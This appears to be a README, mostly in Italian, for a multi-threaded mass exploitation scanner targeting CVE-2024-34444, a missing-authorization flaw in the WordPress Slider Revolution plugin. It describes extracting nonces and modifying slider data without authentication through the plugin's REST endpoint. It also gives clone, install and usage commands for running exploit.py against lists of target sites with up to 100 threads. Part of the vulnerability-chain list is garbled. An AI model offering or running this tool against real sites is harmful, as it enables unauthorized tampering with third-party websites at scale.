
Scanner di massa multi-thread per CVE-2024-34444 (Autorizzazione Mancante) nel plugin WordPress Slider Revolution. Automatizza l'estrazione del nonce, il rilevamento della versione e lo sfruttamento tramite API REST per la modifica non autenticata dei dati dello slider.
Scanner di massa professionale per CVE-2024-34444 che colpisce il plugin WordPress Slider Revolution < 6.7.0
Banner
CVE-2024-34444 è una vulnerabilità di Autorizzazione Mancante nel plugin WordPress Slider Revolution (versioni < 6.7.0). Questo scanner automatizza il rilevamento e lo sfruttamento delle installazioni vulnerabili tramite l'endpoint REST API /wp-json/revslider/v1/slider/save.
Catena di Vulnerabilità:
revslider_actions dal frontend (accessibile pubblicamente)check_nonce() nell'API RESTreadme.txt-v) per log dettagliati-o) per salvare i risultatigit clone https://github.com/dzmind2312/CVE-2024-34444.git
cd CVE-2024-34444
pip3 install -r requirements.txt
# Single target
python3 exploit.py -u https://target.com
# Single target with verbose
python3 exploit.py -u https://target.com -v
# Mass scan from list
python3 exploit.py -l targets.txt -t 20
# Mass scan with output file
python3 exploit.py -l sites.txt -t 50 -o vulnerable.txt
# Full example with all options
python3 exploit.py -l targets.txt -t 100 -o results.txt -v